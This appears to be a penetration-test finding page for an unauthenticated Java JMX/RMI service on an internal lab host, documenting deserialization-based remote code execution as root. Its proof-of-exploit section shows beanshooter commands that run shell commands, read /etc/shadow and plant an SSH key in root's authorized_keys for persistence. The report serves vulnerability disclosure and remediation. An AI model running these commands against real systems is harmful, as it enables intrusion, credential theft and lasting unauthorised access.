Back to FindingsH3-2024-0047
CriticalOpenCWE-502

Insecure Java JMX Configuration

Java RMI Service on 10.0.4.4 (srv01.pod04.h3arange.internal) — Port 1099/TCP

9.8Critical

CVSS v3.1 Score

Attack Vector: Network / Complexity: Low

Attack Paths

197

Affected Hosts

14

Critical Business Impact

This vulnerability was leveraged in 197 attack paths leading to critical impacts including domain compromise, database exfiltration of 847K PII records, and lateral movement across 14 hosts. The estimated data breach cost based on IBM's 2025 Cost of a Data Breach report is $4.88M for this volume of records.

REMOTE CODE EXECUTIONDESERIALIZATIONPRIVILEGE ESCALATIONLATERAL MOVEMENT
Description

The Java Management Extensions (JMX) service on port 1099 of srv01.pod04.h3arange.internal is configured to allow unauthenticated remote connections. An attacker with network access can connect to the JMX service and execute arbitrary Java code through deserialization attacks, leading to full remote code execution on the target host. During the pentest, CyberScanner successfully exploited this misconfiguration to gain a root shell on the target system. The JMX service was found to be running with elevated privileges (root), significantly increasing the blast radius of this vulnerability. This weakness was a critical pivot point in the attack path, enabling lateral movement to the domain controller and eventual domain compromise.

Proof of Exploit

scanJMX Port Scan
08:05:12
$ nmap -sV -p 1099 10.0.4.4
PORT     STATE SERVICE  VERSION
1099/tcp open  java-rmi Java RMI Registry
| rmi-dumpregistry:
|   jmxrmi
|     javax.management.remote.rmi.RMIServerImpl_Stub
|_    @10.0.4.4:43217
exploitUnauthenticated Connection
08:06:33
$ java -jar beanshooter.jar enum 10.0.4.4 1099
[+] Connected to JMX service at 10.0.4.4:1099
[+] Authentication: DISABLED
[+] SSL: DISABLED
[+] Registered MBeans: 27
[+] Available operations: invoke, getAttribute, setAttribute
[+] Target OS: Linux 5.15.0-91-generic (root)
exploitRemote Code Execution
08:07:15
$ beanshooter exec 10.0.4.4 1099 --cmd "id && hostname"
[+] Executing command via MLet MBean...
uid=0(root) gid=0(root) groups=0(root)
srv01.pod04.h3arange.internal

$ beanshooter exec 10.0.4.4 1099 --cmd "cat /etc/shadow | head -3"
root:$6$rZ8K2qL...:19726:0:99999:7:::
daemon:*:19405:0:99999:7:::
bin:*:19405:0:99999:7:::
post exploitPersistence Established
08:08:44
$ beanshooter exec 10.0.4.4 1099 --cmd "echo 'ssh-ed25519 AAAA...test@cyberscanner' >> /root/.ssh/authorized_keys"
[+] Command executed successfully

$ ssh root@10.0.4.4 -i /tmp/cs_key
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-91-generic x86_64)
root@srv01:~#
Related Attack Techniques